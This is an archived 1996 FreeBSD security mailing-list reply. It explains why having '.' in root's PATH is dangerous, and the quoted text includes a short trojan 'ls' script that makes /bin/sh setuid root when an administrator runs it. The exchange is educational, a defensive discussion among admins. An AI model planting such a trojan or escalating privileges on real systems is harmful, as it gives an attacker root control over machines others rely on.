Date: Tue, 25 Jun 1996 00:33:59 -0700 (PDT) From: -Vince- <vince@mercury.gaianet.net> To: "Michael L. VanLoon -- HeadCandy.com" <michaelv@HeadCandy.com> Cc: Mark Murray <mark@grumble.grondar.za>, hackers@freebsd.org, security@freebsd.org, Chad Shackley <chad@mercury.gaianet.net>, jbhunt <jbhunt@mercury.gaianet.net> Subject: Re: I need help on this one - please help me track this guy down! Message-ID: <Pine.BSF.3.91.960625003302.21697j-100000@mercury.gaianet.net> In-Reply-To: <199606250727.AAA24988@MindBender.HeadCandy.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote: > > >> 2) The Cracker made a trojan script somewhere (usually exploiting > >> some admins (roots) who have "." in their path). This way he creates > >> a script that when run as root will make him a suid program. > >> after this he has you by tender bits. > > > Hmmm, doesn't everyone have . as their path since all . does is allow > >someone to run stuff from the current directory... > > Assume root has "." in its path. Hacker puts this little script in > his dir, maybe also in /tmp/; it's called "ls" (imagine the > coincidence), and it's executable by all: > > #!/bin/sh > chown root /bin/sh > /dev/null 2>&1 > chmod u+s,a+x /bin/sh > /dev/null 2>&1 > ls $\* > > Then sits back and waits for the sysadmin to come along and type "ls" > in one of those directories. > > Pop quiz: what is the result? Never thought about that one.... Vince
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960625003302.21697j-100000>